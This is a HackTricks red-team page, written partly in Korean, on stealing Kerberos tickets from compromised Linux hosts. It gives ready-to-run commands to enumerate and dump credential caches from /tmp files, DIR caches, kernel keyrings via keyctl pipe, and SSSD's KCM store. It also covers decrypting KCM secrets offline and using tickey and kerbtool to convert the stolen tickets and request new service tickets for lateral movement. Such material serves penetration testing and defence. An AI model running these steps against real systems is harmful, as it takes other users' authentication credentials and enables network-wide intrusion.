Harvesting Tickets from Linux

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

Credential Storage in Linux

Linux ์‹œ์Šคํ…œ์€ ์ž๊ฒฉ ์ฆ๋ช…์„ ์„ธ ๊ฐ€์ง€ ์œ ํ˜•์˜ ์บ์‹œ์— ์ €์žฅํ•ฉ๋‹ˆ๋‹ค: Files (in /tmp directory), Kernel Keyrings (a special segment in the Linux kernel), ๊ทธ๋ฆฌ๊ณ  Process Memory (for single-process use). /etc/krb5.conf์˜ default_ccache_name ๋ณ€์ˆ˜๋Š” ์‚ฌ์šฉ ์ค‘์ธ ์Šคํ† ๋ฆฌ์ง€ ์œ ํ˜•์„ ์•Œ๋ ค์ฃผ๋ฉฐ, ์ง€์ •๋˜์ง€ ์•Š์œผ๋ฉด ๊ธฐ๋ณธ๊ฐ’์€ FILE:/tmp/krb5cc_%{uid}์ž…๋‹ˆ๋‹ค.

MIT/Heimdal์€ ๋˜ํ•œ ํฌ์ŠคํŠธ ์ต์Šคํ”Œ๋กœ์ž‡ ์ค‘์— ์ฐพ์•„๋ด์•ผ ํ•  ์ถ”๊ฐ€ ๋ฐฑ์—”๋“œ๋ฅผ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค:

  • DIR:/run/user/%{uid}/krb5cc for directory-backed multi-ticket caches (systemd-logind default on modern distros).
  • KEYRING:persistent:%{uid} or KEYRING:session to stash ccaches inside the kernel keyring (KEY_SPEC_SESSION_KEYRING, KEY_SPEC_USER_KEYRING, etc.).
  • KCM:%{uid} when SSSDโ€™s Kerberos Cache Manager daemon (kcm) fronts ticket storage.
  • MEMORY:unique_id for process-local caches created by libraries (gssproxy, sshd, etc.).

์…ธ์„ ํš๋“ํ•  ๋•Œ๋งˆ๋‹ค, ํŒŒ์ผ์„ ๋ณต์‚ฌํ•˜๊ธฐ ์ „์— ์–ด๋–ค ์บ์‹œ ๋ฐฑ์—”๋“œ๊ฐ€ ์‚ฌ์šฉ๋˜๋Š”์ง€ ํ™•์ธํ•˜๋ ค๋ฉด ๊ด€์‹ฌ ์žˆ๋Š” ๋ฐ๋ชฌ (e.g. Apache, sshd, gssproxy)์˜ /proc/<pid>/environ์—์„œ KRB5CCNAME์„ ๋คํ”„ํ•˜์„ธ์š”.

Enumerating Active Caches

๊ณ ๊ฐ€์น˜ ํ‹ฐ์ผ“์„ ๋†“์น˜์ง€ ์•Š๋„๋ก ์ถ”์ถœ ์ „์— ์บ์‹œ๋ฅผ ์—ด๊ฑฐํ•˜์„ธ์š”:

$ klist -l            # list caches registered in the local keyring/KCM
$ klist -A            # show all ticket-granting tickets in the current cache
$ sudo keyctl get_persistent @u
$ sudo keyctl show `keyctl get_persistent @u`
$ sudo ls -al /tmp/krb5cc_* /run/user/*/krb5cc*
$ sudo find /proc -maxdepth 2 -name environ -exec sh -c 'tr "\0" "\n" < {} | grep -H KRB5' \;

The combination of klist, keyctl, and /proc inspection quickly reveals whether credentials live in files, keyrings, or KCM so you can pick the right dumping technique.

์ž๊ฒฉ ์ฆ๋ช… ์ถ”์ถœ

The 2017 paper, Kerberos Credential Thievery (GNU/Linux), outlines methods for extracting credentials from keyrings and processes, emphasizing the Linux kernelโ€™s keyring mechanism for managing and storing keys.

Keyring ์ถ”์ถœ ๊ฐœ์š”

์ปค๋„ ๋ฒ„์ „ 2.6.10์—์„œ ๋„์ž…๋œ keyctl system call์€ ์‚ฌ์šฉ์ž ๊ณต๊ฐ„ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด kernel keyrings์™€ ์ƒํ˜ธ์ž‘์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค€๋‹ค. keyrings์— ์ €์žฅ๋œ ์ž๊ฒฉ์ฆ๋ช…์€ ์ปดํฌ๋„ŒํŠธ(๊ธฐ๋ณธ principal ๋ฐ credentials)๋กœ ์ €์žฅ๋˜๋ฉฐ, ํ—ค๋”๋ฅผ ํฌํ•จํ•˜๋Š” ํŒŒ์ผ ccaches์™€๋Š” ๋‹ค๋ฅด๋‹ค. ๋…ผ๋ฌธ์˜ hercules.sh script๋Š” ์ด๋Ÿฌํ•œ ์ปดํฌ๋„ŒํŠธ๋“ค์„ ์ถ”์ถœํ•˜๊ณ  ์žฌ๊ตฌ์„ฑํ•˜์—ฌ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ํŒŒ์ผ ccache๋กœ ๋งŒ๋“œ๋Š” ๋ฐฉ๋ฒ•์„ ๋ณด์—ฌ์ค€๋‹ค. keyring์— ์ €์žฅ๋œ ccaches๋Š” ๋กœ๊ทธ์ธ ๊ฐ„ ์ง€์†๋˜๋Š” KEYRING:persistent:%{uid}, ๋กœ๊ทธ์•„์›ƒ ์‹œ ์‚ญ์ œ๋˜๋Š” KEYRING:session, ๋˜๋Š” ํ—ฌํผ ์Šค๋ ˆ๋“œ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ์„œ๋น„์Šค์˜ ๊ฒฝ์šฐ KEY_SPEC_THREAD_KEYRING ๋“ฑ์— ์กด์žฌํ•  ์ˆ˜ ์žˆ์œผ๋‹ˆ, ์†์ƒ๋œ UID์— ๋Œ€ํ•ด ๋ชจ๋“  keyring ์œ ํ˜•์„ ํ•ญ์ƒ ์—ด๊ฑฐํ•˜๋ผ.

Manual KEYRING ์›Œํฌํ”Œ๋กœ์šฐ

You can manually harvest tickets without helper scripts whenever default_ccache_name is set to KEYRING::

$ KRING=$(keyctl get_persistent @u)
$ keyctl show $KRING                       # note the key serial of each ccache blob
$ keyctl pipe <serial> > /tmp/ccache_dump  # write raw blob to disk
$ KRB5CCNAME=/tmp/ccache_dump klist        # validate the stolen cache

์—ฌ๋Ÿฌ principals์ด ์ €์žฅ๋˜์–ด ์žˆ์œผ๋ฉด, ์‹œ๋ฆฌ์–ผ๋ณ„๋กœ keyctl pipe ๋‹จ๊ณ„๋ฅผ ๋ฐ˜๋ณตํ•œ ๋‹ค์Œ, ์ถ”์ถœํ•œ ccache๋ฅผ kerbtool(์•„๋ž˜ ์ฐธ์กฐ) ๋˜๋Š” ticketConverter.py ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•ด Windows์— ํ˜ธํ™˜๋˜๋Š” .kirbi/.ccache๋กœ ๋ณ€ํ™˜ํ•œ ๋’ค ๋‹ค๋ฅธ ๋จธ์‹ ์—์„œ ์žฌ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค.

File/DIR Cache Theft Quick Wins

์ž๊ฒฉ ์ฆ๋ช…์ด FILE: ๋˜๋Š” DIR: ์บ์‹œ์— ์ €์žฅ๋˜์–ด ์žˆ์„ ๋•Œ๋Š”, ์ผ๋ฐ˜์ ์œผ๋กœ ๊ฐ„๋‹จํ•œ ํŒŒ์ผ ์ž‘์—…๋งŒ์œผ๋กœ ์ถฉ๋ถ„ํ•ฉ๋‹ˆ๋‹ค:

$ sudo cp /tmp/krb5cc_1000 /tmp/websvc.ccache
$ sudo cp -r /run/user/1000/krb5cc /tmp/user1000_dircc
$ chmod 600 /tmp/*.ccache && chown attacker /tmp/*.ccache

Directory caches contain one file per service ticket, so compress and exfiltrate the whole directory to keep TGT + TGS pairs intact. You can also point your tooling at the directory directly: KRB5CCNAME=DIR:/tmp/user1000_dircc impacket-psexec ....

Dumping KCM-Managed Caches

SSSD์˜ Kerberos Cache Manager (kcm)๋Š” /var/run/kcm/kcmsock (๋˜๋Š” /run/.heim_org.h5l.kcm-socket)์„ ํ†ตํ•ด ์ž๊ฒฉ ์ฆ๋ช… ์ €์žฅ์„ ํ”„๋ก์‹œํ•˜๊ณ , ์•”ํ˜ธํ™”๋œ ๋ธ”๋กญ์„ .secrets.mkey์™€ ํ•จ๊ป˜ /var/lib/sss/secrets/ ์•ˆ์— ์ง€์†์ ์œผ๋กœ ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ ์ˆœ์„œ:

  1. /etc/krb5.conf (default_ccache_name = KCM:) ๋˜๋Š” klist -l ์ถœ๋ ฅ๋ฌผ์„ ํ†ตํ•ด KCM ์‚ฌ์šฉ์„ ์‹๋ณ„ํ•ฉ๋‹ˆ๋‹ค.
  2. UID 0์ด๊ฑฐ๋‚˜ kcm SELinux ๋„๋ฉ”์ธ์— ์†ํ•ด ์žˆ๋‹ค๋ฉด, ๊ด€๋ฆฌ ๋„๊ตฌ๋ฅผ ํ†ตํ•ด ์บ์‹œ๋ฅผ ์—ด๊ฑฐํ•ฉ๋‹ˆ๋‹ค:
$ sudo kcm_ctl list                 # lists UID + cache IDs handled by kcm
$ sudo kcm_ctl get 1000 0 > /tmp/1000.kcm.ccache
$ KRB5CCNAME=/tmp/1000.kcm.ccache klist
  1. Offline approach: copy /var/lib/sss/secrets/secrets.ldb plus /var/lib/sss/secrets/.secrets.mkey, then run SSSDKCMExtractor (or similar PoCs) to decrypt and reassemble ccaches without touching the live socket. This is especially useful in forensics or when socket ACLs block you but disk access is possible.

kcm ๋ฐ๋ชฌ์ด SSSD์— ์˜ํ•ด ๊ฐ•์ œ๋˜๋Š” UID ๊ธฐ๋ฐ˜ ACL์„ ์ค€์ˆ˜ํ•˜๊ธฐ ๋•Œ๋ฌธ์—, ์ผ๋ฐ˜์ ์œผ๋กœ root๋กœ์˜ ๊ถŒํ•œ ์ƒ์Šน(๋˜๋Š” sssd_kcm ์†์ƒ)์ด ํ•„์š”ํ•˜์ง€๋งŒ, ์ผ๋‹จ ๋‹ฌ์„ฑํ•˜๋ฉด ๋ชจ๋“  ์‚ฌ์šฉ์ž์˜ TGT๋ฅผ ๋ช‡ ์ดˆ ์•ˆ์— ๋คํ”„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Ticket Extraction Tooling

์œ„ ๋‹จ๊ณ„๋ฅผ ์ž๋™ํ™”ํ•˜๋ฉด ์‹ค์ˆ˜๋ฅผ ์ค„์ด๊ณ  Windows ๋„๊ตฌ์—์„œ ์žฌ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ํฌ๋กœ์Šค ํ”Œ๋žซํผ ํ‹ฐ์ผ“ ์ž๋ฃŒ๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tickey

Building on the principles of the hercules.sh script, the tickey tool is specifically designed for extracting tickets from keyrings, executed via /tmp/tickey -i. It enumerates kernel keyrings, reconstructs the serialized ccaches, and writes MIT-compatible cache files you can immediately feed to klist, impacket-*, or kerberoast tooling.

Kerbtool

kerbtool is a modern Go utility that runs natively on Linux and can parse, convert, and request Kerberos tickets. Two handy use cases when harvesting from Linux boxes:

# Convert a stolen MIT ccache into a .kirbi usable by Windows tooling
$ ./kerbtool --convert --in /tmp/websvc.ccache --out websvc.kirbi

# Use an extracted cache to request additional TGS tickets without touching the victim again
$ KRB5CCNAME=/tmp/websvc.ccache ./kerbtool --ask --spn cifs/fileserver.lab.local

implant host์— tickey์™€ kerbtool์„ ๋ชจ๋‘ ๋‘๋ฉด Linux, Windows ๋ฐ cross-platform Kerberos attack chains ์‚ฌ์ด๋ฅผ ์›ํ™œํ•˜๊ฒŒ ์ด๋™ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ฐธ๊ณ ์ž๋ฃŒ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ